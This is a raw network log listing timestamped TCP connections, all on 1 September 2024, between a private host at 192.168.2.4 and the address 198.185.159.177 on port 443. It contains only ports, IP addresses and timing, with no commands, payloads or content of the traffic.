Sep 1, 2024 21:57:05.137548923 CEST	49892	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.137562037 CEST	443	49892	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.137624979 CEST	49892	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.137840986 CEST	49892	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.137851000 CEST	443	49892	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.168587923 CEST	49891	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.177272081 CEST	443	49888	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.177431107 CEST	443	49888	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.177505016 CEST	49888	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.181493044 CEST	49888	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.197470903 CEST	443	49889	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.197572947 CEST	49889	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.211880922 CEST	49889	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.212506056 CEST	443	49891	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.535098076 CEST	443	49890	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.535258055 CEST	49890	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.544864893 CEST	49890	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.544877052 CEST	443	49890	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.545140982 CEST	443	49890	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.546300888 CEST	49890	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.548039913 CEST	443	49891	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.548113108 CEST	49891	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.548130035 CEST	49891	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.592503071 CEST	443	49890	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.640377998 CEST	443	49892	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.640508890 CEST	49892	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.653491974 CEST	49892	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.653501034 CEST	443	49892	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.653733969 CEST	443	49892	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.654973030 CEST	49892	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.672677040 CEST	443	49890	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.680392981 CEST	49890	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.680401087 CEST	443	49890	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.696504116 CEST	443	49892	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.787683010 CEST	443	49892	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.787885904 CEST	49892	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.787894964 CEST	443	49892	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.844974995 CEST	443	49890	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.845043898 CEST	443	49890	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.845115900 CEST	49890	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.845387936 CEST	49890	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.853791952 CEST	49893	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.853812933 CEST	443	49893	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.853878021 CEST	49893	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.854100943 CEST	49893	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.854110956 CEST	443	49893	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.935489893 CEST	443	49892	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.935530901 CEST	443	49892	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.935600996 CEST	49892	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.935897112 CEST	49892	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.936202049 CEST	49894	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.936211109 CEST	443	49894	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:05.936274052 CEST	49894	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.936464071 CEST	49894	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:05.936470985 CEST	443	49894	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:06.350632906 CEST	443	49893	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:06.352010012 CEST	49893	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:06.352024078 CEST	443	49893	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:06.398863077 CEST	443	49894	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:06.410024881 CEST	49894	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:06.410041094 CEST	443	49894	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:06.488902092 CEST	443	49893	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:06.523747921 CEST	49893	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:06.523761034 CEST	443	49893	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:06.532725096 CEST	443	49894	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:06.532927990 CEST	49894	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:06.532937050 CEST	443	49894	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:06.589958906 CEST	49894	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:06.590081930 CEST	443	49894	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:06.590152979 CEST	49894	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:06.593067884 CEST	49895	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:06.593082905 CEST	443	49895	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:06.593142033 CEST	49895	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:06.593348980 CEST	49895	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:06.593358994 CEST	443	49895	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:06.594402075 CEST	49896	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:06.594408035 CEST	443	49896	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:06.594468117 CEST	49896	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:06.594680071 CEST	49896	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:06.594688892 CEST	443	49896	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:06.621381998 CEST	49893	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:06.621408939 CEST	443	49893	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:06.621478081 CEST	49893	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.108203888 CEST	443	49896	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.108309031 CEST	49896	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.109586000 CEST	49896	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.109591961 CEST	443	49896	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.109869957 CEST	443	49896	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.111110926 CEST	49896	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.113009930 CEST	443	49895	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.113104105 CEST	49895	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.114273071 CEST	49895	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.114276886 CEST	443	49895	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.114826918 CEST	443	49895	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.117779970 CEST	49895	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.152504921 CEST	443	49896	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.164505005 CEST	443	49895	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.242042065 CEST	443	49896	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.247411013 CEST	49896	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.247419119 CEST	443	49896	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.258466959 CEST	443	49895	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.258608103 CEST	49895	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.258615017 CEST	443	49895	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.385246038 CEST	443	49896	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.385314941 CEST	443	49896	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.385360003 CEST	49896	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.393948078 CEST	49896	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.394978046 CEST	49897	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.395003080 CEST	443	49897	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.395076036 CEST	49897	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.395282984 CEST	49897	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.395291090 CEST	443	49897	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.410722017 CEST	443	49895	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.410809994 CEST	443	49895	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.410861969 CEST	49895	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.411107063 CEST	49895	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.411426067 CEST	49898	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.411434889 CEST	443	49898	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.411499023 CEST	49898	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.411686897 CEST	49898	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.411695957 CEST	443	49898	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.841084003 CEST	443	49897	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.842528105 CEST	49897	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.842554092 CEST	443	49897	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.853225946 CEST	443	49898	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.868935108 CEST	49898	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.868951082 CEST	443	49898	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.975104094 CEST	443	49897	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.975270987 CEST	49897	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.975280046 CEST	443	49897	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.976258039 CEST	443	49898	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:07.976392984 CEST	49898	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:07.976399899 CEST	443	49898	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.104260921 CEST	49897	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.104300976 CEST	443	49897	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.104433060 CEST	443	49897	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.104473114 CEST	49897	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.105242968 CEST	443	49898	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.105273962 CEST	49897	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.105317116 CEST	443	49898	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.105366945 CEST	49898	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.105571032 CEST	49898	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.105820894 CEST	49899	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.105848074 CEST	443	49899	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.105909109 CEST	49899	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.106080055 CEST	49899	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.106091022 CEST	443	49899	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.111541033 CEST	49900	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.111557007 CEST	443	49900	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.111614943 CEST	49900	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.111782074 CEST	49900	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.111795902 CEST	443	49900	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.117407084 CEST	49901	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.117415905 CEST	443	49901	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.117489100 CEST	49901	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.117685080 CEST	49901	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.117691994 CEST	443	49901	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.143748999 CEST	49899	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.188500881 CEST	443	49899	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.555474043 CEST	443	49901	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.555576086 CEST	49901	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.557920933 CEST	443	49900	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.557996988 CEST	49900	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.561672926 CEST	443	49899	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.561754942 CEST	49899	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.561769009 CEST	49899	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.635983944 CEST	49900	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.638411045 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.638422966 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.638492107 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.650176048 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.650187969 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.652616978 CEST	49901	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.652627945 CEST	443	49901	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.653001070 CEST	443	49901	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.654325008 CEST	49901	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.657871008 CEST	49901	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.657912016 CEST	443	49901	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.657967091 CEST	49901	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.659816980 CEST	49903	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.659840107 CEST	443	49903	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.659900904 CEST	49903	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.660103083 CEST	49903	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.660115004 CEST	443	49903	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.661952972 CEST	49904	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.661978960 CEST	443	49904	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.662039995 CEST	49904	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.662211895 CEST	49904	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.662228107 CEST	443	49904	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:08.664438009 CEST	49903	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:08.708498955 CEST	443	49903	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.230082989 CEST	443	49904	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.230207920 CEST	49904	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.231436968 CEST	49904	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.231443882 CEST	443	49904	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.231724977 CEST	443	49904	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.232880116 CEST	49904	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.236474991 CEST	443	49903	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.236565113 CEST	49903	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.236582041 CEST	49903	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.276544094 CEST	443	49904	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.313126087 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.313245058 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.317151070 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.317157984 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.317544937 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.318973064 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.352253914 CEST	443	49904	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.352440119 CEST	49904	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.352449894 CEST	443	49904	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.364506006 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.445450068 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.454945087 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.454967022 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.455022097 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.455025911 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.455121994 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.455133915 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.455248117 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.455260038 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.455363035 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.455379009 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.455476999 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.455492020 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.455595970 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.455607891 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.455655098 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.455665112 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.465065956 CEST	443	49904	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.465137005 CEST	443	49904	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.465190887 CEST	49904	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.465540886 CEST	49904	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.466105938 CEST	49905	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.466134071 CEST	443	49905	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.466197014 CEST	49905	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.466391087 CEST	49905	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.466401100 CEST	443	49905	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.773502111 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.773557901 CEST	443	49902	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.773610115 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.774053097 CEST	49902	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.774667978 CEST	49906	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.774693966 CEST	443	49906	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.774745941 CEST	49906	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.786287069 CEST	49906	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.786298037 CEST	443	49906	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.904273033 CEST	443	49905	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:09.905898094 CEST	49905	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:09.905919075 CEST	443	49905	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.037586927 CEST	443	49905	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.045720100 CEST	49905	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.045728922 CEST	443	49905	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.182852030 CEST	443	49905	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.182925940 CEST	443	49905	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.182986021 CEST	49905	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.192946911 CEST	49905	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.193645000 CEST	49907	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.193670988 CEST	443	49907	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.193749905 CEST	49907	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.193953037 CEST	49907	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.193964005 CEST	443	49907	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.271176100 CEST	443	49906	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.273235083 CEST	49906	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.273248911 CEST	443	49906	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.395806074 CEST	443	49906	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.411942959 CEST	49906	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.411950111 CEST	443	49906	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.539177895 CEST	443	49906	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.539218903 CEST	443	49906	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.539288998 CEST	49906	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.539628983 CEST	49906	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.540213108 CEST	49908	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.540222883 CEST	443	49908	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.541536093 CEST	49908	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.541784048 CEST	49908	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.541790962 CEST	443	49908	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.717978001 CEST	443	49907	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.723021030 CEST	49907	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.723046064 CEST	443	49907	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.835422039 CEST	443	49907	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.836045027 CEST	49907	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.836055040 CEST	443	49907	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.965465069 CEST	443	49907	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.965538025 CEST	443	49907	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.965594053 CEST	49907	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.965867043 CEST	49907	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.966517925 CEST	49909	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.966531038 CEST	443	49909	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:10.969531059 CEST	49909	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.969742060 CEST	49909	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:10.969752073 CEST	443	49909	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.077347040 CEST	443	49908	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.078866959 CEST	49908	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:11.078880072 CEST	443	49908	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.210618973 CEST	443	49908	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.213618994 CEST	49908	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:11.213625908 CEST	443	49908	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.356913090 CEST	443	49908	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.356954098 CEST	443	49908	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.357024908 CEST	49908	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:11.357321978 CEST	49908	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:11.357891083 CEST	49910	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:11.357906103 CEST	443	49910	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.357964039 CEST	49910	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:11.358153105 CEST	49910	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:11.358163118 CEST	443	49910	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.471313953 CEST	443	49909	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.472764969 CEST	49909	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:11.472779036 CEST	443	49909	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.598153114 CEST	443	49909	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.598339081 CEST	49909	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:11.598347902 CEST	443	49909	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.748678923 CEST	443	49909	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.748748064 CEST	443	49909	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.748807907 CEST	49909	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:11.749078989 CEST	49909	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:11.749752998 CEST	49911	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:11.749768972 CEST	443	49911	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.749836922 CEST	49911	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:11.750015974 CEST	49911	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:11.750029087 CEST	443	49911	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.863770962 CEST	443	49910	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:11.866740942 CEST	49910	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:11.866753101 CEST	443	49910	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.008423090 CEST	443	49910	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.008558989 CEST	49910	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.008567095 CEST	443	49910	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.148087978 CEST	443	49910	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.148129940 CEST	443	49910	198.185.159.177	192.168.2.4
Sep 1, 2024 21:57:12.148175001 CEST	49910	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.148514032 CEST	49910	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.149127960 CEST	49912	443	192.168.2.4	198.185.159.177
Sep 1, 2024 21:57:12.149141073 CEST	443	49912	198.185.159.177	192.168.2.4
